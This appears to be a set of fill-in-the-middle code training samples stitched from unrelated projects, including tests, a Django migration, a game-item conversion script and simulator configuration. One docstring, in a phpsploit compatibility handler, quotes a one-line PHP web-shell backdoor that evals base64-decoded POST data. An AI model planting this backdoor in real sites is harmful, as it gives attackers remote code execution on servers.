let open_result = xiapi::xiOpenDevice( wIndex, handle);
|
<|file_name|>fail-simple.rs<|end_file_name|><|fim▁begin|>// -*- rust -*-
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.<|fim▁hole|>
// error-pattern:unexpected token
fn main() {
fail!(@);
}<|fim▁end|> | |
<|file_name|>0004_auto_20180313_1052.py<|end_file_name|><|fim▁begin|># Generated by Django 2.0.2 on 2018-03-13 02:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cc', '0003_auto_20180228_1145'),
]
operations = [
migrations.AlterField(
model_name='creditcard',
name='tail_no',
field=models.CharField(max_length=10),<|fim▁hole|><|fim▁end|> | ),
] |
<|file_name|>compose.spec.js<|end_file_name|><|fim▁begin|>const curry = require('../../curry');
const compose = require('..');
describe('Compose', () => {<|fim▁hole|> const prefixDr = curry((prefix, name) => `${prefix} ${name}`)('Dr');
const suffixBatchelor = curry((suffix, name) => `${name} ${suffix}`)('BSc');
const suffixMasters = curry((suffix, name) => `${name} ${suffix}`)('MSc');
const suffixDoctor = curry((suffix, name) => `${name} ${suffix}`)('PhD');
const composeName = compose([prefixDr, suffixDoctor, suffixMasters, suffixBatchelor]);
expect(composeName('Bob Johnson')).toEqual('Dr Bob Johnson BSc MSc PhD');
});
});<|fim▁end|> | test('should compose name', () => { |
<|file_name|>compat_handler.py<|end_file_name|><|fim▁begin|>"""Backwards compatible tunnel handler for
phpsploit v1 backdoors, aka:
<?php eval(base64_decode($_POST[%%PASSKEY%%])); ?>
"""
__all__ = ["Request_V1_x"]
from . import handler
from .exceptions import BuildError
class Request_V1_x(handler.Request):
<|fim▁hole|> super().__init__()
self.default_method = "POST"
def build_forwarder(self, method, decoder):
"""Assuming that phpsploit v1 uses POST data as payload container
without using an intermediate forwarder, this method shall
always return an empty dictionnary.
"""
return {}
def load_multipart(self):
raise BuildError("Can't send multi request in v1-compatible mode")<|fim▁end|> | def __init__(self):
"""Force default method to POST, because only this one
was supported on phpsploit v1 versions.
""" |
<|file_name|>conversion.py<|end_file_name|><|fim▁begin|># Developed for module tiericide, this script will quickly print out a market
# conversion map based on patch notes, as well as database conversion mapping.
import argparse
import os.path
import sqlite3
import sys
# Add eos root path to sys.path so we can import ourselves
path = os.path.dirname(str(__file__, sys.getfilesystemencoding()))
sys.path.append(os.path.realpath(os.path.join(path, "..")))
# change to correct conversion
rename_phrase = " is now known as "
conversion_phrase = " is being converted to "
text = """Partial Weapon Navigation is being converted to Phased Scoped Target Painter
Indirect Scanning Dampening Unit I is being converted to Phased Muon Scoped Sensor Dampener
'Broker' Remote Sensor Dampener I is being converted to 'Executive' Remote Sensor Dampener
Initiated Ion Field ECM I is being converted to Hypnos Scoped Magnetometric ECM
FZ-3 Subversive Spatial Destabilizer ECM is being converted to BZ-5 Scoped Gravimetric ECM
'Penumbra' White Noise ECM is being converted to Umbra Scoped Radar ECM
Faint Phase Inversion ECM I is being converted to Enfeebling Scoped Ladar ECM
'Hypnos' Multispectral ECM I is being converted to Compulsive Scoped Multispectral ECM
1Z-3 Subversive ECM Eruption is being converted to Cetus Scoped Burst Jammer
'Prayer' Remote Tracking Computer is being converted to P-S Compact Remote Tracking Computer
'Tycoon' Remote Tracking Computer is being converted to 'Enterprise' Remote Tracking Computer
Monopulse Tracking Mechanism I is being converted to F-12 Enduring Tracking Computer
'Orion' Tracking CPU I is being converted to Optical Compact Tracking Computer
'Economist' Tracking Computer I is being converted to 'Marketeer' Tracking Computer
Beta-Nought Tracking Mode is being converted to 'Basic' Tracking Enhancer
Azimuth Descalloping Tracking Enhancer is being converted to 'Basic' Tracking Enhancer
F-AQ Delay-Line Scan Tracking Subroutines is being converted to 'Basic' Tracking Enhancer
Beam Parallax Tracking Program is being converted to 'Basic' Tracking Enhancer
Sigma-Nought Tracking Mode I is being converted to Fourier Compact Tracking Enhancer
Auto-Gain Control Tracking Enhancer I is being converted to Fourier Compact Tracking Enhancer
F-aQ Phase Code Tracking Subroutines is being converted to Fourier Compact Tracking Enhancer
Lateral Gyrostabilizer is being converted to 'Basic' Gyrostabilizer
F-M2 Weapon Inertial Suspensor is being converted to 'Basic' Gyrostabilizer
Hydraulic Stabilization Actuator is being converted to 'Basic' Gyrostabilizer
Stabilized Weapon Mounts is being converted to 'Basic' Gyrostabilizer
Cross-Lateral Gyrostabilizer I is being converted to Counterbalanced Compact Gyrostabilizer
F-M3 Munition Inertial Suspensor is being converted to Counterbalanced Compact Gyrostabilizer
Pneumatic Stabilization Actuator I is being converted to Counterbalanced Compact Gyrostabilizer
Monophonic Stabilization Actuator I is being converted to 'Kindred' Gyrostabilizer
Monophonic Stabilization Actuator I Blueprint is being converted to 'Kindred' Gyrostabilizer Blueprint
Heat Exhaust System is being converted to 'Basic' Heat Sink
C3S Convection Thermal Radiator is being converted to 'Basic' Heat Sink
'Boreas' Coolant System is being converted to 'Basic' Heat Sink
Stamped Heat Sink is being converted to 'Basic' Heat Sink
Thermal Exhaust System I is being converted to Extruded Compact Heat Sink
C4S Coiled Circuit Thermal Radiator is being converted to Extruded Compact Heat Sink
'Skadi' Coolant System I is being converted to Extruded Compact Heat Sink
'Mangonel' Heat Sink I is being converted to 'Trebuchet' Heat Sink I
'Mangonel' Heat Sink I Blueprint is being converted to 'Trebuchet' Heat Sink Blueprint
Insulated Stabilizer Array is being converted to 'Basic' Magnetic Field Stabilizer
Linear Flux Stabilizer is being converted to 'Basic' Magnetic Field Stabilizer
Gauss Field Balancer is being converted to 'Basic' Magnetic Field Stabilizer
Magnetic Vortex Stabilizer is being converted to 'Basic' Magnetic Field Stabilizer
Insulated Stabilizer Array I is being converted to Vortex Compact Magnetic Field Stabilizer
Linear Flux Stabilizer I is being converted to Vortex Compact Magnetic Field Stabilizer
Gauss Field Balancer I is being converted to Vortex Compact Magnetic Field Stabilizer
'Capitalist' Magnetic Field Stabilizer I is being converted to 'Monopoly' Magnetic Field Stabilizer
'Capitalist' Magnetic Field Stabilizer I Blueprint is being converted to 'Monopoly' Magnetic Field Stabilizer Blueprint
Muon Coil Bolt Array I is being converted to Crosslink Compact Ballistic Control System
Multiphasic Bolt Array I is being converted to Crosslink Compact Ballistic Control System
'Pandemonium' Ballistic Enhancement is being converted to Crosslink Compact Ballistic Control System
Ballistic 'Purge' Targeting System I is being converted to 'Full Duplex' Ballistic Control System
Ballistic 'Purge' Targeting System I Blueprint is being converted to 'Full Duplex' Ballistic Control System Blueprint
'Langour' Drive Disruptor I is being converted to X5 Enduring Stasis Webifier
Patterned Stasis Web I is being converted to Fleeting Compact Stasis Webifier
Fleeting Progressive Warp Scrambler I is being converted to Faint Epsilon Scoped Warp Scrambler
Fleeting Warp Disruptor I is being converted to Faint Scoped Warp Disruptor
GLFF Containment Field is being converted to 'Basic' Damage Control
Interior Force Field Array is being converted to 'Basic' Damage Control
F84 Local Damage System is being converted to 'Basic' Damage Control
Systematic Damage Control is being converted to 'Basic' Damage Control
'Gonzo' Damage Control I is being converted to 'Radical' Damage Control
'Gonzo' Damage Control I Blueprint is being converted to 'Radical' Damage Control Blueprint
Emergency Damage Control I is being converted to IFFA Compact Damage Control
F85 Peripheral Damage System I is being converted to IFFA Compact Damage Control
Pseudoelectron Containment Field I is being converted to IFFA Compact Damage Control
Micro Ld-Acid Capacitor Battery I is being converted to 'Micro' Cap Battery
Micro Ohm Capacitor Reserve I is being converted to 'Micro' Cap Battery
Micro F-4a Ld-Sulfate Capacitor Charge Unit is being converted to 'Micro' Cap Battery
Micro Peroxide Capacitor Power Cell is being converted to 'Micro' Cap Battery
Micro Capacitor Battery II is being converted to 'Micro' Cap Battery
Small Ohm Capacitor Reserve I is being converted to Small Compact Pb-Acid Cap Battery
Small F-4a Ld-Sulfate Capacitor Charge Unit is being converted to Small Compact Pb-Acid Cap Battery
Small Peroxide Capacitor Power Cell is being converted to Small Compact Pb-Acid Cap Battery
Medium Ohm Capacitor Reserve I is being converted to Medium Compact Pb-Acid Cap Battery
Medium F-4a Ld-Sulfate Capacitor Charge Unit is being converted to Medium Compact Pb-Acid Cap Battery
Medium Peroxide Capacitor Power Cell is being converted to Medium Compact Pb-Acid Cap Battery
Large Ohm Capacitor Reserve I is being converted to Large Compact Pb-Acid Cap Battery
Large F-4a Ld-Sulfate Capacitor Charge Unit is being converted to Large Compact Pb-Acid Cap Battery
Large Peroxide Capacitor Power Cell is being converted to Large Compact Pb-Acid Cap Battery
ECCM - Radar I is being converted to Sensor Booster I
ECCM - Ladar I is being converted to Sensor Booster I
ECCM - Magnetometric I is being converted to Sensor Booster I
ECCM - Gravimetric I is being converted to Sensor Booster I
ECCM - Omni I is being converted to Sensor Booster I
ECCM - Radar I Blueprint is being converted to Sensor Booster I Blueprint
ECCM - Ladar I Blueprint is being converted to Sensor Booster I Blueprint
ECCM - Magnetometric I Blueprint is being converted to Sensor Booster I Blueprint
ECCM - Gravimetric I Blueprint is being converted to Sensor Booster I Blueprint
ECCM - Omni I Blueprint is being converted to Sensor Booster I Blueprint
Alumel Radar ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster
Alumel Ladar ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster
Alumel Gravimetric ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster
Alumel Omni ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster<|fim▁hole|>Supplemental Ladar ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Gravimetric ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Omni ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Radar ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Magnetometric ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Extra Radar ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Extra Ladar ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Extra Gravimetric ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Extra Magnetometric ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Gravimetric Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Radar Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Omni Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Ladar Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Magnetometric Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Incremental Radar ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Incremental Ladar ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Incremental Gravimetric ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Incremental Magnetometric ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Radar Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Ladar Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Gravimetric Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Omni Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Magnetometric Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Conjunctive Radar ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Conjunctive Ladar ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Conjunctive Gravimetric ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Conjunctive Magnetometric ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
ECCM - Omni II is being converted to Sensor Booster II
ECCM - Gravimetric II is being converted to Sensor Booster II
ECCM - Ladar II is being converted to Sensor Booster II
ECCM - Magnetometric II is being converted to Sensor Booster II
ECCM - Radar II is being converted to Sensor Booster II
ECCM - Omni II Blueprint is being converted to Sensor Booster II Blueprint
ECCM - Gravimetric II Blueprint is being converted to Sensor Booster II Blueprint
ECCM - Ladar II Blueprint is being converted to Sensor Booster II Blueprint
ECCM - Magnetometric II Blueprint is being converted to Sensor Booster II Blueprint
ECCM - Radar II Blueprint is being converted to Sensor Booster II Blueprint
'Forger' ECCM - Magnetometric I is being converted to 'Shady' Sensor Booster
'Forger' ECCM - Magnetometric I Blueprint is being converted to 'Shady' Sensor Booster Blueprint
Basic RADAR Backup Array is being converted to 'Basic' Signal Amplifier
Basic Ladar Backup Array is being converted to 'Basic' Signal Amplifier
Basic Gravimetric Backup Array is being converted to 'Basic' Signal Amplifier
Basic Magnetometric Backup Array is being converted to 'Basic' Signal Amplifier
Basic Multi Sensor Backup Array is being converted to 'Basic' Signal Amplifier
Emergency Magnetometric Scanners is being converted to 'Basic' Signal Amplifier
Emergency Multi-Frequency Scanners is being converted to 'Basic' Signal Amplifier
Emergency RADAR Scanners is being converted to 'Basic' Signal Amplifier
Emergency Ladar Scanners is being converted to 'Basic' Signal Amplifier
Emergency Gravimetric Scanners is being converted to 'Basic' Signal Amplifier
Sealed RADAR Backup Cluster is being converted to 'Basic' Signal Amplifier
Sealed Magnetometric Backup Cluster is being converted to 'Basic' Signal Amplifier
Sealed Multi-Frequency Backup Cluster is being converted to 'Basic' Signal Amplifier
Sealed Ladar Backup Cluster is being converted to 'Basic' Signal Amplifier
Sealed Gravimetric Backup Cluster is being converted to 'Basic' Signal Amplifier
Surplus RADAR Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative RADAR Backup Sensors is being converted to 'Basic' Signal Amplifier
Surplus Magnetometric Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative Magnetometric Backup Sensors is being converted to 'Basic' Signal Amplifier
Surplus Multi-Frequency Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative Multi-Frequency Backup Sensors is being converted to 'Basic' Signal Amplifier
Surplus Ladar Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative Ladar Backup Sensors is being converted to 'Basic' Signal Amplifier
Surplus Gravimetric Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative Gravimetric Backup Sensors is being converted to 'Basic' Signal Amplifier
Gravimetric Backup Array I is being converted to Signal Amplifier I
Ladar Backup Array I is being converted to Signal Amplifier I
Magnetometric Backup Array I is being converted to Signal Amplifier I
Multi Sensor Backup Array I is being converted to Signal Amplifier I
RADAR Backup Array I is being converted to Signal Amplifier I
Gravimetric Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
Ladar Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
Magnetometric Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
Multi Sensor Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
RADAR Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
Protected Gravimetric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Protected Ladar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Protected Magnetometric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Protected Multi-Frequency Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Protected RADAR Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Reserve Gravimetric Scanners is being converted to F-89 Compact Signal Amplifier
Reserve Ladar Scanners is being converted to F-89 Compact Signal Amplifier
Reserve Magnetometric Scanners is being converted to F-89 Compact Signal Amplifier
Reserve Multi-Frequency Scanners is being converted to F-89 Compact Signal Amplifier
Reserve RADAR Scanners is being converted to F-89 Compact Signal Amplifier
Secure Gravimetric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Secure Ladar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Secure Magnetometric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Secure Radar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive Gravimetric Backup Sensors is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive Ladar Backup Sensors is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive Magnetometric Backup Sensors is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive Multi-Frequency Backup Sensors is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive RADAR Backup Sensors is being converted to F-89 Compact Signal Amplifier
Shielded Gravimetric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Shielded Ladar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Shielded Magnetometric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Shielded Radar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Surrogate Gravimetric Reserve Array I is being converted to F-89 Compact Signal Amplifier
Surrogate Ladar Reserve Array I is being converted to F-89 Compact Signal Amplifier
Surrogate Magnetometric Reserve Array I is being converted to F-89 Compact Signal Amplifier
Surrogate Multi-Frequency Reserve Array I is being converted to F-89 Compact Signal Amplifier
Surrogate RADAR Reserve Array I is being converted to F-89 Compact Signal Amplifier
Warded Gravimetric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Warded Ladar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Warded Magnetometric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Warded Radar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Gravimetric Backup Array II is being converted to Signal Amplifier II
Ladar Backup Array II is being converted to Signal Amplifier II
Magnetometric Backup Array II is being converted to Signal Amplifier II
Multi Sensor Backup Array II is being converted to Signal Amplifier II
RADAR Backup Array II is being converted to Signal Amplifier II
Gravimetric Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
Ladar Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
Magnetometric Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
Multi Sensor Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
RADAR Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
Gravimetric Firewall is being converted to 'Firewall' Signal Amplifier
Ladar Firewall is being converted to 'Firewall' Signal Amplifier
Magnetometric Firewall is being converted to 'Firewall' Signal Amplifier
Multi Sensor Firewall is being converted to 'Firewall' Signal Amplifier
RADAR Firewall is being converted to 'Firewall' Signal Amplifier
ECCM Projector I is being converted to Remote Sensor Booster I
ECCM Projector I Blueprint is being converted to Remote Sensor Booster I Blueprint
Scattering ECCM Projector I is being converted to Linked Enduring Sensor Booster
Piercing ECCM Emitter I is being converted to Coadjunct Scoped Remote Sensor Booster
Spot Pulsing ECCM I is being converted to F-23 Compact Remote Sensor Booster
Phased Muon ECCM Caster I is being converted to F-23 Compact Remote Sensor Booster
ECCM Projector II is being converted to Remote Sensor Booster II
ECCM Projector II Blueprint is being converted to Remote Sensor Booster II Blueprint
Prototype Sensor Booster is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Scanning CPU I is being converted to F-90 Compact Sensor Booster
Amplitude Signal Enhancer is being converted to 'Basic' Signal Amplifier
'Acolyth' Signal Booster is being converted to 'Basic' Signal Amplifier
Type-E Discriminative Signal Augmentation is being converted to 'Basic' Signal Amplifier
F-90 Positional Signal Amplifier is being converted to 'Basic' Signal Amplifier
'Mendicant' Signal Booster I is being converted to F-89 Compact Signal Amplifier
Wavelength Signal Enhancer I is being converted to F-89 Compact Signal Amplifier
Type-D Attenuation Signal Augmentation is being converted to F-89 Compact Signal Amplifier
Connected Remote Sensor Booster is being converted to F-23 Compact Remote Sensor Booster
'Boss' Remote Sensor Booster is being converted to 'Bootleg' Remote Sensor Booster
'Entrepreneur' Remote Sensor Booster is being converted to 'Bootleg' Remote Sensor Booster
'Pacifier' Large Remote Armor Repairer is being converted to 'Peace' Large Remote Armor Repairer
'Pacifier' Large Remote Armor Repairer Blueprint is being converted to 'Peace' Large Remote Armor Repairer Blueprint
'Broker' Remote Sensor Dampener I Blueprint is being converted to 'Executive' Remote Sensor Dampener Blueprint
'Tycoon' Remote Tracking Computer Blueprint is being converted to 'Enterprise' Remote Tracking Computer Blueprint
'Economist' Tracking Computer I Blueprint is being converted to 'Marketeer' Tracking Computer Blueprint"""
def main(old, new):
# Open both databases and get their cursors
old_db = sqlite3.connect(os.path.expanduser(old))
old_cursor = old_db.cursor()
new_db = sqlite3.connect(os.path.expanduser(new))
new_cursor = new_db.cursor()
renames = {}
conversions = {}
for x in text.splitlines():
if conversion_phrase in x:
c = x.split(conversion_phrase)
container = conversions
elif rename_phrase in x:
c = x.split(rename_phrase)
container = renames
else:
print("Unknown format: {}".format(x))
sys.exit()
old_name, new_name = c[0], c[1]
old_item, new_item = None, None
if "Blueprint" in old_name or "Blueprint" in new_name:
print("Blueprint: Skipping this line: %s"%x)
continue
# gather item info
new_cursor.execute('SELECT "typeID" FROM "invtypes" WHERE "typeName" = ?', (new_name,))
for row in new_cursor:
new_item = row[0]
break
old_cursor.execute('SELECT "typeID" FROM "invtypes" WHERE "typeName" = ?', (old_name,))
for row in old_cursor:
old_item = row[0]
break
if not old_item:
print("Error finding old item in {} -> {}".format(old_name, new_name))
if not new_item:
print("Error finding new item in {} -> {}".format(old_name, new_name))
if not container.get((new_item,new_name), None):
container[(new_item,new_name)] = []
container[(new_item,new_name)].append((old_item, old_name))
print(" # Renamed items")
for new, old in renames.items():
if len(old) != 1:
print("Incorrect length, key: {}, value: {}".format(new, old))
sys.exit()
old = old[0]
print(" \"{}\": \"{}\",".format(old[1], new[1]))
# Convert modules
print("\n # Converted items")
for new, olds in conversions.items():
for old in olds:
print(" \"{}\": \"{}\",".format(old[1], new[1]))
print()
print()
for new, old in conversions.items():
print(" {}: ( # {}".format(new[0], new[1]))
for item in old:
print(" {}, # {}".format(item[0], item[1]))
print(" ),")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--old", type=str)
parser.add_argument("-n", "--new", type=str)
args = parser.parse_args()
main(args.old, args.new)<|fim▁end|> | Alumel Magnetometric ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster |
<|file_name|>test_zip.py<|end_file_name|><|fim▁begin|>import io<|fim▁hole|>from waterbutler.core import streams
from waterbutler.core.utils import AsyncIterator
from tests import utils
class TestZipHandler(utils.HandlerTestCase):
HOOK_PATH = 'waterbutler.server.api.v0.zip.ZipHandler._send_hook'
@testing.gen_test
def test_download_stream(self):
data = b'freddie brian john roger'
stream = streams.StringStream(data)
stream.content_type = 'application/octet-stream'
zipstream = streams.ZipStreamReader(AsyncIterator([('file.txt', stream)]))
self.mock_provider.zip = utils.MockCoroutine(return_value=zipstream)
resp = yield self.http_client.fetch(
self.get_url('/zip?provider=queenhub&path=/freddie.png'),
)
zip = zipfile.ZipFile(io.BytesIO(resp.body))
assert zip.testzip() is None
assert zip.open('file.txt').read() == data<|fim▁end|> | import zipfile
from tornado import testing
|
<|file_name|>TrialParamValue.java<|end_file_name|><|fim▁begin|>package org.adligo.tests4j.system.shared.trials;
import org.adligo.tests4j.shared.common.ClassMethods;
import org.adligo.tests4j.shared.xml.I_XML_Builder;
public class TrialParamValue implements I_TrialParamValue {
public static final String TAG_NAME = "value";
public static final String CLASS_NAME = "class";
public static final String PARAMETER_VALUE_MUST_BE_A_NON_VOID_PRIMITIVE_OR_STRING =
"Parameter value must be a non Void primitive or String.";
private Object value_;
public TrialParamValue(Object value) {
if (value == null) {
throw new NullPointerException();
}
Class<?> c = value.getClass();
if ( (ClassMethods.isPrimitiveClass(c) && !ClassMethods.isClass(Void.class, c))
|| ClassMethods.isClass(String.class, c)) {
value_ = value;
} else {
throw new IllegalArgumentException(
PARAMETER_VALUE_MUST_BE_A_NON_VOID_PRIMITIVE_OR_STRING);
}
}
@Override
public String getClassName() {
return value_.getClass().getName();
}
@Override
public Object getValue() {
return value_;
}
@Override
public void toXml(I_XML_Builder builder) {
builder.addIndent();
builder.addStartTag(TAG_NAME);
String name = ClassMethods.getSimpleName(value_.getClass());
builder.addAttribute(CLASS_NAME, name);
builder.endHeader();
builder.addText(value_.toString());
builder.addEndTag(TAG_NAME);<|fim▁hole|> }
}<|fim▁end|> | builder.endLine(); |
<|file_name|>ScreenLockLandscapeOutlined.js<|end_file_name|><|fim▁begin|>"use strict";
var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault");
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.default = void 0;
var _createSvgIcon = _interopRequireDefault(require("./utils/createSvgIcon"));
var _jsxRuntime = require("react/jsx-runtime");
var _default = (0, _createSvgIcon.default)( /*#__PURE__*/(0, _jsxRuntime.jsx)("path", {
d: "M21 5H3c-1.1 0-2 .9-2 2v10c0 1.1.9 2 2 2h18c1.1 0 2-.9 2-2V7c0-1.1-.9-2-2-2zm-2 12H5V7h14v10zm-9-1h4c.55 0 1-.45 1-1v-3c0-.55-.45-1-1-1v-1c0-1.11-.9-2-2-2-1.11 0-2 .9-2 2v1c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1zm.8-6c0-.66.54-1.2 1.2-1.2s1.2.54 1.2 1.2v1h-2.4v-1z"<|fim▁hole|><|fim▁end|> | }), 'ScreenLockLandscapeOutlined');
exports.default = _default; |
<|file_name|>probebus.py<|end_file_name|><|fim▁begin|>###############################################################################
# This file is part of openWNS (open Wireless Network Simulator)
# _____________________________________________________________________________
#
# Copyright (C) 2004-2007
# Chair of Communication Networks (ComNets)
# Kopernikusstr. 16, D-52074 Aachen, Germany
# phone: ++49-241-80-27910,
# fax: ++49-241-80-22242
# email: [email protected]
# www: http://www.openwns.org
# _____________________________________________________________________________
#
# openWNS is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License version 2 as published by the
# Free Software Foundation;
#
# openWNS is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import openwns
import openwns.logger
from openwns.pyconfig import attrsetter
import openwns.interface
class NeedsFilename(openwns.interface.Interface):
@openwns.interface.abstractmethod
def setFilename(self, filename):
pass
class MeasurementSource(object):
def __init__(self):
object.__init__(self)
self.observers = []
def addObserver(self, probeBus):
self.observers.append(probeBus)
return probeBus
class ProbeBus(MeasurementSource):
def __init__(self):
MeasurementSource.__init__(self)
def observe(self, probeBus):
probeBus.addObserver(self)
return probeBus
class ProbeBusRegistry(object):
def __init__(self):
super(ProbeBusRegistry, self).__init__()
self.measurementSources = {}
self.logger = openwns.logger.Logger("WNS", "ProbeBusRegistry", True)
def getMeasurementSource(self, probeBusID):
if not self.measurementSources.has_key(probeBusID):
self.measurementSources[probeBusID] = MeasurementSource()
return self.measurementSources[probeBusID]
def removeMeasurementSource(self, probeBusID):
self.measurementSources.pop(probeBusID)
def getMeasurementSources(self):
return self.measurementSources
class PassThroughProbeBus(ProbeBus):
""" The PassThroughProbeBus always accepts and always forwards. """
nameInFactory = "PassThroughProbeBus"
def __init__(self):
ProbeBus.__init__(self)
class SettlingTimeGuardProbeBus(ProbeBus):
""" The SettlingTimeGuardProbeBus only accepts if the global settling time (transient phase)
has elapsed"""
nameInFactory = "SettlingTimeGuardProbeBus"
def __init__(self, settlingTime):
ProbeBus.__init__(self)
self.settlingTime = settlingTime
class LoggingProbeBus(ProbeBus):
""" The LoggingProbeBus always accepts and logs the message to the logging subsystem.
"""
nameInFactory = "LoggingProbeBus"
def __init__(self, probeName='', parentLogger=None):
ProbeBus.__init__(self)
if len(probeName) > 0:
probeName = '.' + probeName
self.logger = openwns.logger.Logger("WNS", "LoggingProbeBus"+probeName, True, parentLogger)
class PythonProbeBus(ProbeBus):
""" Use the PythonProbeBus to do all your probing work in python. Specify what to do
in accepts, onMeasurement, output from within your configuration file."""
nameInFactory = "PythonProbeBus"
def _dummyOnMeasurement(timestamp, value, reg):
pass
def _dummyOutput():
pass
def __init__(self, acceptsFunction, onMeasurementFunction = _dummyOnMeasurement, outputFunction = _dummyOutput):
ProbeBus.__init__(self)
self.accepts = acceptsFunction
self.onMeasurement = onMeasurementFunction
self.output = outputFunction
self.reportErrors = True
class TimeWindowProbeBus(ProbeBus):
""" Only accepts for a certain time window given by start and end time"""
nameInFactory = "TimeWindowProbeBus"
def __init__(self, start, end):
ProbeBus.__init__(self)
self.start = start
self.end = end
class TimeSeriesProbeBus(ProbeBus):
""" The LogEval ProbeBus always accepts and logs the values into a file.
"""
nameInFactory = "TimeSeriesProbeBus"
outputFilename = None
format = None
timePrecision = None
valuePrecision = None
name = None
description = None
contextKeys = None
def __init__(self, outputFilename, format, timePrecision, valuePrecision, name, desc, contextKeys):
ProbeBus.__init__(self)
self.outputFilename = outputFilename
self.format = format
self.timePrecision = timePrecision
self.valuePrecision = valuePrecision
self.name = name
self.description = desc
self.contextKeys = contextKeys
class ContextFilterProbeBus(ProbeBus):
nameInFactory = "ContextFilterProbeBus"
idName = None
idValues = None
def __init__(self, _idName, _idValues, _outputName = None):
ProbeBus.__init__(self)
self.idName = _idName
self.idValues = _idValues
class ConstantContextProvider(object):
__plugin__ = "wns.ProbeBus.ConstantContextProvider"
""" Name in the static factory """
key = None
""" The name of the context """
value = None
""" A constant integer value """
def __init__(self, key, value):
super(ConstantContextProvider, self).__init__()
self.key = key
self.value = value
class StatEvalProbeBus(ProbeBus):
nameInFactory = "StatEvalProbeBus"
statEval = None
appendFlag = None
def __init__(self, outputFilename, statEvalConfig):
ProbeBus.__init__(self)
self.outputFilename = outputFilename
